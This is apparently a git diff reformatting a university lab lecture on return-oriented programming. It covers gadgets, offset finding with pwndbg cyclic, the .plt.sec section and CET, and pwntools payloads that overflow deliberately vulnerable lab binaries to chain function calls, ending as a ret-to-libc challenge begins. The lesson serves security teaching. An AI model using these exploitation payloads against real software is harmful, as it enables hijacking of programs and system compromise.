are blocks of instructions that end with a `ret` instruction. Here are some *gadgets* from the previous program: -``` + +```text 0x8048443: pop ebp; ret 0x80484a7: pop edi; pop ebp; ret 0x8048441: mov ebp,esp; pop ebp; ret @@ -283,47 +250,47 @@ Here are some *gadgets* from the previous program: 0x80484c3: pop ecx; pop ebx; leave; ret ``` -By carefully placing addresses to such gadgets on the stack we can bring code -execution to almost any context we want. As an example, let's say we would like -to load `0x41424344` into `eax` and `0x61626364` into `ebx`. The payload should -look like this: -``` +By carefully placing addresses to such gadgets on the stack we can bring code execution to almost any context we want. +As an example, let's say we would like to load `0x41424344` into `eax` and `0x61626364` into `ebx`. +The payload should look like this: + +```text RET + 0x00: 0x80482da (pop eax; pop ebx; leave; ret) RET + 0x04: 0x41424344 RET + 0x08: 0x61626364 RET + 0x0c: 0xAABBCCDD (instruction were the gadget's ret will jump to) ``` + Let's see what exactly happens when this payload is given to our binary: + - First the ret addr is popped from the stack and execution goes there. - At `pop eax`, `0x41424344` is loaded into `eax` and the stack is increased. -- At `pop ebx`, `0x61626364` is loaded into `ebx` and the stack is increased -again. -- At `leave`, two things actually happen: `mov esp, ebp; pop ebp`. So the stack -frame is decreased to the previous one (pointed by `ebp`) and `ebp` is updated -to the one before that. So `esp` will now be the old `ebp + 4`. -- At `ret`, the code flow will go to the instruction pointed to by `ebp+4`. This -implies that execution will not go to `0xAABBCCDD` but to some other address -that may or may not be in our control (depending on how much we can overflow on -the stack). If it is in our control we can overwrite that address with the rest -of the ROP chain. +- At `pop ebx`, `0x61626364` is loaded into `ebx` and the stack is increased again. +- At `leave`, two things actually happen: `mov esp, ebp; pop ebp`. + So the stack frame is decreased to the previous one (pointed by `ebp`) and `ebp` is updated to the one before that. + So `esp` will now be the old `ebp + 4`. +- At `ret`, the code flow will go to the instruction pointed to by `ebp+4`. + This implies that execution will not go to `0xAABBCCDD` but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). + If it is in our control we can overwrite that address with the rest of the `ROP` chain. ### Changing Register Values -We have now seen how gadgets can be useful if we want the CPU to achieve a -certain state. This is particularly useful on other architectures such as ARM -and x86_64 where functions do not take parameters from the stack but from -registers. As an example, if we want to call `f1(0xAB, 0xCD, 0xEF)` on x86_64 we -first need to know the calling convention for the first three parameters (the -convention for placing the rest of the parameters can be found in -[table here](https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions)): -``` + +We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. +This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. +As an example, if we want to call `f1(0xAB, 0xCD, 0xEF)` on x86_64 we first need to know the calling convention for the first three parameters (the convention for placing the rest of the parameters can be found in [table here](https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions)): + +```text 1st param: RDI 2nd param: RSI 3rd param: RDX ``` -Now we need to find gadgets for each of these parameters. Let's assume these 2 -scenarios: Scenario 1: -``` +Now we need to find gadgets for each of these parameters. +Let's assume these 2 scenarios: + +**Scenario 1:** + +```text 0x400124: pop rdi; pop rsi; ret 0x400235: pop rdx; ret 0x400440: f1() @@ -337,8 +304,9 @@ RET + 0x20: val of RDX RET + 0x28: f1 ``` -Scenario 2: -``` +**Scenario 2:** + +```text 0x400125: pop rdi; ret 0x400252: pop rsi; ret 0x400235: pop rdx; ret @@ -349,61 +317,67 @@ RET + 0x00: 0x400125 RET + 0x08: val of RDI (0xAB) RET + 0x10: 0x400252 RET + 0x18: val of RSI (0xCD) -RET + 0x20: 0x400235 +RET + 0x20: 0x400235 RET + 0x28: val of RDX RET + 0x30: f1 ``` -Notice that because the architecture is 64 bits wide, the values on the stack -are not dwords but qwords (quad words: 8 bytes wide). Thus, the offsets between -the values in the payload are 8, instead of 4 (as they would be on a 32-bit -architecture). + +Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide). +Thus, the offsets between the values in the payload are 8, instead of 4 (as they would be on a 32-bit architecture). ### Clearing the Stack -The second use of gadgets is to clear the stack. Remember the issue we had in -the [Motivation](#motivation) section? Let's solve it using gadgets. We need to call -`f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`. Our initial solution was: -``` + +The second use of gadgets is to clear the stack. +Remember the issue we had in the [Motivation](#motivation) section? +Let's solve it using gadgets. +We need to call `f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`. +Our initial solution was: + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) -RET + 0x10: 0x42 (param2 of f2) +RET + 0x10: 0x42 (param2 of f2) ``` -Note that now, for the sake of clarity, we're moving back to `x32`, so that -parameters are again passed on the stack. +Note that now, for the sake of clarity, we're moving back to `x32`, so that parameters are again passed on the stack. -The problem is that those parameters of `f1` are getting in the way of calling -`f2`. We need to find a `pop pop ret` gadget. The actual registers are not -important, as we only need to clear 2 values from the stack. -``` +The problem is that those parameters of `f1` are getting in the way of calling `f2`. +We need to find a `pop pop ret` gadget. +The actual registers are not important, as we only need to clear 2 values from the stack. + +```text RET + 0x00: addr of f1 -RET + 0x04: addr of (pop eax, pop ebx, ret) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x04: addr of (pop eax, pop ebx, ret) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 RET + 0x14: JUNK RET + 0x18: 0xEF (param1 of f2) -RET + 0x1c: 0x42 (param2 of f2) +RET + 0x1c: 0x42 (param2 of f2) ``` Now we can even call the next function `f3` if we repeat the trick: -``` + +```text RET + 0x00: addr of f1 -RET + 0x04: addr of (pop eax, pop ebx, ret) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x04: addr of (pop eax, pop ebx, ret) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 -RET + 0x14: addr of (pop eax, pop ebx, ret) +RET + 0x14: addr of (pop eax, pop ebx, ret) RET + 0x18: 0xEF (param1 of f2) -RET + 0x1c: 0x42 (param2 of f2) +RET + 0x1c: 0x42 (param2 of f2) RET + 0x20: addr of f3 ``` - ## Some Useful Tricks + ### Memory Spraying + Let's take the following program: + ```c int main() { @@ -411,26 +385,22 @@ int main() char a,b,c; char buf[23]; read(0, buf, 100); - + return 0; } ``` -It's a fairly simple overflow, but just how fast can you figure out the offset -to the return address? How much padding do you need? There is a shortcut that -you can use to figure this out in under 30 seconds without looking at the -*Assembly* code. - -A [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence) is a -string of symbols out of a given alphabet in which each consecutive K symbols -only appear once in the whole string. If we can construct such a string out of -printable characters then we only need to know the Segmentation Fault address. -Converting it back to 4 bytes and searching for it in the initial string will -give us the exact offset to the return address. - -[pwndbg]() can help you do this, using the -[cyclic](https://docs.pwntools.com/en/stable/util/cyclic.html) package from the -`pwnlib` library: -``` + +It's a fairly simple overflow, but just how fast can you figure out the offset to the return address? +How much padding do you need? +There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly code. + +A [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence) is a string of symbols out of a given alphabet in which each consecutive K symbols only appear once in the whole string. +If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. +Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address. + +[pwndbg](https://github.com/pwndbg/pwndbg) can help you do this, using the [cyclic](https://docs.pwntools.com/en/stable/util/cyclic.html) package from the `pwnlib` library: + +```console pwndbg> cyclic 100 # create a 100-character long De Bruijn sequence aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa @@ -441,11 +411,11 @@ pwndbg> cyclic -l faaa # the offset of faaa in the above cyclic pattern is 20 20 ``` -``` +```console pwndbg> cyclic 100 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa pwndbg> run -Starting program: /media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello +Starting program: /media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa Program received signal SIGSEGV, Segmentation fault. @@ -460,7 +430,7 @@ LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ESI 0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c EBP 0x61616173 ('saaa') ESP 0x61616178 ('uaaa') - EIP 0x61616174 ('taaa') + EIP 0x61616174 ('taaa') ──────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────── Invalid address 0x61616174 [...] @@ -473,7 +443,8 @@ the buffer is 76, as the address that EIP points to is `0x61616174`, i.e. `'taaa'`, which lies at offset 76 in the cyclic pattern we've just generated. ### checksec in pwndbg -``` + +```console pwndbg> checksec [*] '/media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello' Arch: i386-32-little @@ -484,7 +455,8 @@ pwndbg> checksec ``` ### Finding Gadgets in `pwndbg` -``` + +```console pwndbg> rop Gadgets information ============================================================ @@ -509,33 +481,27 @@ pwndbg> rop --grep "pop .* ; pop .* ; ret" # you can perform a finer search usi 0x08049240 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x08049242 : pop edi ; pop ebp ; ret 0x08049241 : pop esi ; pop edi ; pop ebp ; ret - ``` - ## Further Reading -### ROP Gadgets in `pwntools` -`pwntools` has a rather advanced -[ROP module](https://docs.pwntools.com/en/stable/rop/rop.html) that is capable -of crafting ROP attacks corresponding to various functions by creating -concatenating chains of ROP adresses, also known as ROP chains. -For this session, you won't need to use this module, but it may come in handy in -the future. +### `ROP` Gadgets in `pwntools` + +`pwntools` has a rather advanced [`ROP` module](https://docs.pwntools.com/en/stable/rop/rop.html) that is capable of crafting `ROP` attacks corresponding to various functions by creating concatenating chains of `ROP` addresses, also known as `ROP` chains. + +For this session, you won't need to use this module, but it may come in handy in the future. ### Linux x86 Program Start Up -Notice that the `__libc_start_main` will always be present in the relocation -table. As you discovered in the session dedicated to -[executable file formats](https://github.com/hexcellents/sss-binary/tree/master/sessions/executable-file-formats), -this is the function called by the code from the `_start` label, which, in turn, -calls the `main()` function. -To find more details about the startup of a Linux x86 program, you can read -about it -[here](http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html). +Notice that the `__libc_start_main` will always be present in the relocation table. +As you discovered in the session dedicated to [executable file formats](https://github.com/hexcellents/sss-binary/tree/master/sessions/executable-file-formats), this is the function called by the code from the `_start` label, which, in turn, calls the `main()` function. + +To find more details about the startup of a Linux x86 program, you can read about it [here](http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html). ### The `.plt.sec` Schema + Let's go back to the small piece of code at the beginning of this lecture: + ```c #include @@ -546,10 +512,9 @@ int main(void) } ``` -If we compile it with a more modern (later than 2019) version of even the most -"old-school" compilers, such as `gcc`, we will notice a slight (but actually -important) difference in the `.plt` schema used by the resulting binary file. -``` +If we compile it with a more modern (later than 2019) version of even the most "old-school" compilers, such as `gcc`, we will notice a slight (but actually important) difference in the `.plt` schema used by the resulting binary file. + +```console $ gcc -m32 -fno-PIC -no-pie hello.c -o hello $ objdump -M intel -d hello [...] @@ -559,11 +524,11 @@ Disassembly of section .plt: 8049030: ff 35 04 c0 04 08 push DWORD PTR ds:0x804c004 8049036: ff 25 08 c0 04 08 jmp DWORD PTR ds:0x804c008 804903c: 0f 1f 40 00 nop DWORD PTR [eax+0x0] - 8049040: f3 0f 1e fb endbr32 + 8049040: f3 0f 1e fb endbr32 8049044: 68 00 00 00 00 push 0x0 8049049: e9 e2 ff ff ff jmp 8049030 <.plt> 804904e: 66 90 xchg ax,ax - 8049050: f3 0f 1e fb endbr32 + 8049050: f3 0f 1e fb endbr32 8049054: 68 08 00 00 00 push 0x8 8049059: e9 d2 ff ff ff jmp 8049030 <.plt> 804905e: 66 90 xchg ax,ax @@ -571,26 +536,28 @@ Disassembly of section .plt: Disassembly of section .plt.sec: 08049060 : - 8049060: f3 0f 1e fb endbr32 + 8049060: f3 0f 1e fb endbr32 8049064: ff 25 0c c0 04 08 jmp DWORD PTR ds:0x804c00c 804906a: 66 0f 1f 44 00 00 nop WORD PTR [eax+eax*1+0x0] [...] ``` -Now it seems there are two `.plt` sections: the "classic" `.plt` and a new -`.plt.sec` section. Moreover, the entries in the `.plt.sec` section are very -similar to those we've previously shown as being part of `.plt`. So why 2 -`.plt`'s? And if the initial `.plt` entries have been moved over to `.plt.sec`, -what is the purpose of the `.plt` section now? +Now it seems there are two `.plt` sections: the "classic" `.plt` and a new `.plt.sec` section. +Moreover, the entries in the `.plt.sec` section are very similar to those we've previously shown as being part of `.plt`. +So why 2 `.plt`'s? +And if the initial `.plt` entries have been moved over to `.plt.sec`, what is the purpose of the `.plt` section now? First, let's check the call to `puts()` itself: -``` + +```console $ objdump -D -j .text -M intel hello | grep puts 80491b3: e8 a8 fe ff ff call 8049060 ``` + So we see that the function being called now resides in the `.plt.sec` section. What about the offset that `.plt.sec` redirect jumps to (i.e. `0x804c00c`)? -``` + +```console $ objdump -s -M intel -j .got.plt --start-address=0x0804c00c hello hello: file format elf32-i386 @@ -601,101 +568,80 @@ Contents of section .got.plt: Similarly to what we did previously, we now see that `0x804c00c` points to address `0x08049040`, which is this code inside the `.plt` section: -``` -8049040: f3 0f 1e fb endbr32 + +```text +8049040: f3 0f 1e fb endbr32 8049044: 68 00 00 00 00 push 0x0 8049049: e9 e2 ff ff ff jmp 8049030 <.plt> 804904e: 66 90 xchg ax,ax ``` -So with the `.plt.sec` schema, there are 2 redirects: one from `.plt.sec` to -`.got` (or `.got.plt` to be more precise) and another from `.got.plt` to `.plt`. -Notice in the `.plt` stub above that, like before, `0x0` is pushed onto the -stack before the resolver is called, so that the dynamic linker can change it to -the actual address of `puts()` from libc. +So with the `.plt.sec` schema, there are 2 redirects: one from `.plt.sec` to `.got` (or `.got.plt` to be more precise) and another from `.got.plt` to `.plt`. +Notice in the `.plt` stub above that, like before, `0x0` is pushed onto the stack before the resolver is called, so that the dynamic linker can change it to the actual address of `puts()` from libc. So why use `.plt.sec` at all if in the end it looks like it does the same thing? -Well, `.plt.sec` is an x86-only security enhancement of the `.plt` section -(hence the `.sec` part of the name, duh...), that is used only when a security -enhancement feature called **CET (Control-flow Enforcement Technology)** is -enabled. In this comment, I'll explain what the feature is and why we have two -PLT sections if CET is enabled. - -So, what does CET do? CET introduces a new restriction to indirect jump -instructions. In order to understand how CET works, let's assume that it is -enabled. Then, if you execute an indirect jump instruction, the processor -verifies that a special "landing pad" instruction, which is actually a -repurposed `NOP` instruction (now called `endbr32` or `endbr64`, as you can see -in the above snippets), is at the jump target. If the jump target does not start -with that instruction, the processor raises an exception instead of continuing -to execute code. - -If CET is enabled, the compiler places `endbr` instructions to all locations -where indirect jumps may lead. This mechanism makes it extremely hard to -transfer the control to a middle of a function that is not supporsed to be a -indirect jump target, preventing certain types of attacks, such as ROP or JOP -(jump-oriented programming; very similar to ROP). +Well, `.plt.sec` is an x86-only security enhancement of the `.plt` section (hence the `.sec` part of the name, duh...), that is used only when a security enhancement feature called **CET (Control-flow Enforcement Technology)** is enabled. +In this comment, I'll explain what the feature is and why we have two PLT sections if CET is enabled. + +So, what does CET do? +CET introduces a new restriction to indirect jump instructions. +In order to understand how CET works, let's assume that it is enabled. +Then, if you execute an indirect jump instruction, the processor verifies that a special "landing pad" instruction, which is actually a repurposed `NOP` instruction (now called `endbr32` or `endbr64`, as you can see in the above snippets), is at the jump target. +If the jump target does not start with that instruction, the processor raises an exception instead of continuing to execute code. + +If CET is enabled, the compiler places `endbr` instructions to all locations where indirect jumps may lead. +This mechanism makes it extremely hard to transfer the control to a middle of a function that is not supporsed to be a indirect jump target, preventing certain types of attacks, such as `ROP` or JOP (jump-oriented programming; very similar to `ROP`). Now, let's explain why we have this extra PLT section for when CET is enabled. -Since you can indirectly jump to a PLT entry, we have to make PLT entries start -with an `endbr` instruction. The problem is there was no extra space for `endbr` -(which is 4 bytes long) in the old `.plt` entry schema, as the PLT entry is only -16 bytes long and all of them are already used. +Since you can indirectly jump to a PLT entry, we have to make PLT entries start with an `endbr` instruction. +The problem is there was no extra space for `endbr` (which is 4 bytes long) in the old `.plt` entry schema, as the PLT entry is only 16 bytes long and all of them are already used. -In order to deal with the issue, each PLT entry was splt into two separate -entries. Remember that each PLT entry contains code to jump to an address read -from `.got.plt` **AND** code to resolve a dynamic symbol lazily. With the 2-PLT -schema, the former code is written to `.plt.sec`, and the latter code is written -to `.plt`, as demonstrated above. +In order to deal with the issue, each PLT entry was splt into two separate entries. +Remember that each PLT entry contains code to jump to an address read from `.got.plt` **AND** code to resolve a dynamic symbol lazily. +With the 2-PLT schema, the former code is written to `.plt.sec`, and the latter code is written to `.plt`, as demonstrated above. #### More about CET and `endbr` -- A more in-depth look at the inner workings of CET and the concept of the -**Shadow Stack** that it uses, can be found -[here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) -and -[here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) -- The way `endbr` instructions interact with the CPU is explained -[here](https://cdrdv2.intel.com/v1/dl/getContent/631121), at page 38 + +- A more in-depth look at the inner workings of CET and the concept of the **Shadow Stack** that it uses, can be found [here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) and [here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) +- The way `endbr` instructions interact with the CPU is explained [here](https://cdrdv2.intel.com/v1/dl/getContent/631121), at page 38 #### TLDR -Lazy symbol resolution in the 2-PLT schema works in the usual way, except -that the regular `.plt` is now called `.plt.sec` and `.plt` is repurposed to -contain only code for lazy symbol resolution. +Lazy symbol resolution in the 2-PLT schema works in the usual way, except that the regular `.plt` is now called `.plt.sec` and `.plt` is repurposed to contain only code for lazy symbol resolution. + +## Putting it All Together: Demo -## Putting it all Together: Demo -Now that we've learned the theoretical aspects of what Return Oriented -Programming is, let's put everything in practice as part of a demo. +Now that we've learned the theoretical aspects of what Return-Oriented Programming is, let's put everything in practice as part of a demo. -Navigate to the folder [00-demo](activities/00-demo). Notice that it contains -two executables, one compiled for 32 bits (`vuln`) and the other for 64 bits -(`vuln64`). TODO: diff +Navigate to the folder [00-demo](activities/00-demo). +Notice that it contains two executables, one compiled for 32 bits (`vuln`) and the other for 64 bits (`vuln64`). -Looking at their source code (it's one and the same for both of them), we can -easily identify their vulnerability: the `reader` function reads (duh...) 128 -bytes from `stdin` into a buffer whose capacity is only 64 bytes. So we'll be -able to overflow this buffer. We aim to do this in order to showcase the concept -of **code reuse**. +Looking at their source code (it's one and the same for both of them), we can easily identify their vulnerability: the `reader` function reads (duh...) 128 bytes from `stdin` into a buffer whose capacity is only 64 bytes. +So we'll be able to overflow this buffer. +We aim to do this in order to showcase the concept of **code reuse**. ### Calling a Function -The most basic type of code reuse is calling a function. For this, we'll be -calling the `warcraft` function in the `vuln` and `vuln64` binaries mentioned -above. In order to do this, we'll need to know: -1. the offset of the return address inside our buffer -2. the address of the `warcraft` function inside the binary. - -For all our exploits we'll be using the `exploit.py` script, which is also -available in the [00-demo](activities/00-demo) folder. Notice that `pwntools` -provides a functionality similar to `nm`, by which we can obtain the addresses -of various sybols in the binary (as long as it hasn't been stripped): + +The most basic type of code reuse is calling a function. +For this, we'll be calling the `warcraft` function in the `vuln` and `vuln64` binaries mentioned above. + +In order to do this, we'll need to know: + +- the offset of the return address inside our buffer +- the address of the `warcraft` function inside the binary. + +For all our exploits we'll be using the `exploit.py` script, which is also available in the [00-demo](activities/00-demo) folder. +Notice that `pwntools` provides a functionality similar to `nm`, by which we can obtain the addresses of various sybols in the binary (as long as it hasn't been stripped): + ```python e = ELF(filename) warcraft_address = e.symbols[b"warcraft"] ``` -As of now, requirement #2 mentioned above is complete. In order to also complete -the first requirement, we'll use `objdump` and check the `reader` function: -``` +As of now, requirement #2 mentioned above is complete. +In order to also complete the first requirement, we'll use `objdump` and check the `reader` function: + +```console $ objdump -M intel -d vuln 08048529 : 8048529: 55 push ebp @@ -709,106 +655,99 @@ $ objdump -M intel -d vuln 804854a: 50 push eax 804854b: e8 10 fe ff ff call 8048360 ``` -Our vulnerable buffer is the first parameter of `fgets`, which is at offset -`ebp - 0x40` i.e. `ebp - 64`. Which means that the offset of the return address -is `64 + 4 = 68` bytes into this buffer (remember how a stack frame looks like). -So, in order to call the `warcraft` function, we'll give our binary a payload -made up of a padding of 68 bytes, followed by the address of `warcraft`, written -in _little endian_ representation, which can be written like this: +Our vulnerable buffer is the first parameter of `fgets`, which is at offset `ebp - 0x40` i.e. `ebp - 64`. +Which means that the offset of the return address is `64 + 4 = 68` bytes into this buffer (remember how a stack frame looks like). + +So, in order to call the `warcraft` function, we'll give our binary a payload made up of a padding of 68 bytes, followed by the address of `warcraft`, written in little endian representation, which can be written like this: + ```python offset = 0x40 + 4 payload = offset * b"A" + pack(warcraft_address) ``` -Now our exploit is done. In order to perform this exploit on `vuln64`, simply -run `objdump` on this binary and remember that the length of a pointer on a -64-bit architecture is 8 bytes, which means that the offset of the return -address is going to be `rbp + 8`. -One thing to keep in mind is that you are by no means required to use addresses -that point to the beginning of functions in your payloads. You can use any valid -address from the `.text` section and the exploit should work just fine in -executing code from the address you provide it. +Now our exploit is done. +In order to perform this exploit on `vuln64`, simply run `objdump` on this binary and remember that the length of a pointer on a 64-bit architecture is 8 bytes, which means that the offset of the return address is going to be `rbp + 8`. + +One thing to keep in mind is that you are by no means required to use addresses that point to the beginning of functions in your payloads. +You can use any valid address from the `.text` section and the exploit should work just fine in executing code from the address you provide it. -Now on to our next scenario: what if the function we're calling requires a -parameter? +Now on to our next scenario: what if the function we're calling requires a parameter? ### Calling a Function with Parameters -Let's first look at the stack of a function when it's called "normally", i.e. -with a `call` instruction. Let's use the `overwatch` function in `vuln.c` as an -example. The picture below shows where its parameter is placed. - -![Overwatch Stack](assets/overwatch_stack_simple.png) - -Furthermore, as expected, the function retrieves its parameter from address -`ebp + 8`, as shown above. How can we craft a payload so that, upon entering the -function, the required `0xdeadbeef` parameter is where the function expects it -to be? - -We'll obviously need to place `0xdeadbeef` on the stack (in little endian -representation, of course), but where? After the function's preamble -(`push ebp; mov esp, ebp`), `ebp` points to the location where the previous -stack pointer it saved. Above it, the function expects to find its return -address. Thus, we need to write 4 padding bytes in its place. The next 4 bytes -are the first parameter. Just for reference, the next 4 bytes (`ebp + 12`) are -the second parameter and so on. So, in order to call `overwatch` with the -`0xdeadbeef` parameter, the payload would look like this: + +Let's first look at the stack of a function when it's called "normally", i.e. with a `call` instruction. +Let's use the `overwatch` function in `vuln.c` as an example. +The picture below shows where its parameter is placed. + +![Overwatch Stack](../media/overwatch_stack_simple.png) + +Furthermore, as expected, the function retrieves its parameter from address `ebp + 8`, as shown above. +How can we craft a payload so that, upon entering the function, the required `0xdeadbeef` parameter is where the function expects it to be? + +We'll obviously need to place `0xdeadbeef` on the stack (in little endian representation, of course), but where? +After the function's preamble (`push ebp; mov esp, ebp`), `ebp` points to the location where the previous stack pointer it saved. +Above it, the function expects to find its return address. +Thus, we need to write 4 padding bytes in its place. +The next 4 bytes are the first parameter. +Just for reference, the next 4 bytes (`ebp + 12`) are the second parameter and so on. +So, in order to call `overwatch` with the `0xdeadbeef` parameter, the payload would look like this: + ```python payload = offset * b"A" + pack(overwatch_address) + 4 * b"B" + pack(0xdeadbeef) ``` -Take a look at those 4 `B`'s in the payload above. We agreed that they are -`overwatch`'s expected return address. So if we wanted to call another function, -we would only need to replace them with that function's address. Pretty simple, -right? But what if we wanted to call a third function? Well, then we would need -to overwrite the next 4 bytes in our payload with a third address. Easy! But now -we have actually run into trouble: the next 4 bytes are `overwatch`'s parameter. -In this situation it looks like we **either** call `overwatch` or we call a third -function. Not cool. In this case, `overwatch`s stack would look like this: +Take a look at those 4 `B`'s in the payload above. +We agreed that they are `overwatch`'s expected return address. +So if we wanted to call another function, we would only need to replace them with that function's address. +Pretty simple, right? +But what if we wanted to call a third function? +Well, then we would need to overwrite the next 4 bytes in our payload with a third address. +Easy! +But now we have actually run into trouble: the next 4 bytes are `overwatch`'s parameter. +In this situation it looks like we **either** call `overwatch` or we call a third function. +Not cool. +In this case, `overwatch`s stack would look like this: -![Overwatch Stack with Conflicting Parameter/Address](assets/overwatch_stack_conflict.png) +![Overwatch Stack with Conflicting Parameter/Address](../media/overwatch_stack_conflict.png) -It seems we need another mechanism so that we can call **all 3 functions** with -all their correct parameters. Enter ROPs! +It seems we need another mechanism so that we can call **all 3 functions** with all their correct parameters. +Enter `ROP`s! ### Calling Multiple Functions -What we need in order to solve the dilemma presented above is a means by which -to **remove** `overwatch`'s parameter (i.e. `0xdeadbeef`) from the stack once -the function is finished. We know that the `pop` instruction is good for -removing stuff from the stack. So what we need is to execute the following two -instructions: -```assembly + +What we need in order to solve the dilemma presented above is a means by which to **remove** `overwatch`'s parameter (i.e. `0xdeadbeef`) from the stack once the function is finished. +We know that the `pop` instruction is good for removing stuff from the stack. +So what we need is to execute the following two instructions: + +```asm pop ret ``` -Since `ret` is equivalent to `pop eip`, the above code removes `0xdeadbeef` from -the stack and places the instruction pointer (`eip`) at the address lying on the -stack above `0xdeadbeef`. One thing to keep in mind is that now we're only -interested in clearing the stack, so `pop` can be used with any 32 bit register. +Since `ret` is equivalent to `pop eip`, the above code removes `0xdeadbeef` from the stack and places the instruction pointer (`eip`) at the address lying on the stack above `0xdeadbeef`. +One thing to keep in mind is that now we're only interested in clearing the stack, so `pop` can be used with any 32 bit register. As a result, `overwatch`'s stack should look like the one in the image below. -Notice there are no more conflicts now. Hurray! +Notice there are no more conflicts now. +Hurray! -![Overwatch Stack without Conflicting Parameters and Addresses](assets/overwatch_stack_no_conflict.png) +![Overwatch Stack without Conflicting Parameters and Addresses](../media/overwatch_stack_no_conflict.png) #### Finding Gadgets - `ROPgadget` -The `pop; ret` instructions above are called a **gadget**, i.e. a small group of -**consecutive** instructions that ends in `ret` and which can be used to alter -the execution of a given program. Since all binaries contain a `.text` section, -which is made up of instructions, all binaries contain gadgets. Lots of them. - -The tool that we're going to use in order to find such gadgets is called -`ROPgadget`. It is already installed in the Kali VM and if you're working on -another environment, you can install it by following the instructions in the -tool's [Github repo](https://github.com/JonathanSalwan/ROPgadget). - -In order to run `ROPgadget` from your terminal, you need to specify a binary -file to it using the `--binary` parameter. It is also recommended (if you know -what gadgets you're looking for) to filter those you need using the `--only` -parameter. As a result, in order to obtain a `pop; ret` gadget, we need to run -the following command: -```bash + +The `pop; ret` instructions above are called a **gadget**, i.e. a small group of **consecutive** instructions that ends in `ret` and which can be used to alter the execution of a given program. +Since all binaries contain a `.text` section, which is made up of instructions, all binaries contain gadgets. +Lots of them. + +The tool that we're going to use in order to find such gadgets is called `ROPgadget`. +It is already installed in the Kali VM and if you're working on another environment, you can install it by following the instructions in the tool's [Github repo](https://github.com/JonathanSalwan/ROPgadget). + +In order to run `ROPgadget` from your terminal, you need to specify a binary file to it using the `--binary` parameter. +It is also recommended (if you know what gadgets you're looking for) to filter those you need using the `--only` parameter. +As a result, in order to obtain a `pop; ret` gadget, we need to run the following command: + +```console $ ROPgadget --binary vuln --only "pop|ret" Gadgets information ============================================================ @@ -822,44 +761,40 @@ Gadgets information 0x0804844e : ret 0xeac1 ``` -Thus, the payload needed in order to call both `overwatch` and `warcraft` is the -one showcased below, with `pop_ret_gadget_address` being set to `0x08048331` -from the output above. +Thus, the payload needed in order to call both `overwatch` and `warcraft` is the one showcased below, with `pop_ret_gadget_address` being set to `0x08048331` from the output above. + ```python payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) ``` -Notice this yet is another example of **code reuse** since we're reusing various -chunks of instructions already present in our binary. - +Notice this yet is another example of **code reuse** since we're reusing various chunks of instructions already present in our binary. ## Challenges + ### 01. Tutorial - Bypass NX Stack with return-to-libc -Go to the [01-tutorial-ret-to-libc/](activities/01-tutorial-ret-to-libc/src/) -folder. +Go to the [01-tutorial-ret-to-libc/](activities/01-tutorial-ret-to-libc/src/) folder. -In the previous sessions we used stack overflow vulnerabilities to inject new -code into a running process (on its stack) and redirect execution to it. This -attack is easily defeated by making the stack, together with any other memory -page that can be modified, non-executable. This is achieved by setting the -**NX** bit in the page table of the current process. +In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stack) and redirect execution to it. +This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. +This is achieved by setting the `NX` bit in the page table of the current process. -We will try to bypass this protection for the `01-tutorial-ret-to-libc/src/auth` -binary in the lab archive. For now, disable ASLR in the a new shell: -``` -$ setarch $(uname -m) -R /bin/bash +We will try to bypass this protection for the `01-tutorial-ret-to-libc/src/auth` binary in the lab archive. +For now, disable ASLR in the a new shell: + +```console +setarch $(uname -m) -R /bin/bash ``` -Let's take a look at the program headers and confirm that the stack is no longer -executable. We only have read and write (RW) permissions for the stack area. -The auth binary requires the `libssl1.0.0:i386` Debian package to work. You can -find `libssl1.0.0:i386` Debian package -[here](https://packages.debian.org/jessie/i386/libssl1.0.0/download). +Let's take a look at the program headers and confirm that the stack is no longer executable. +We only have read and write (RW) 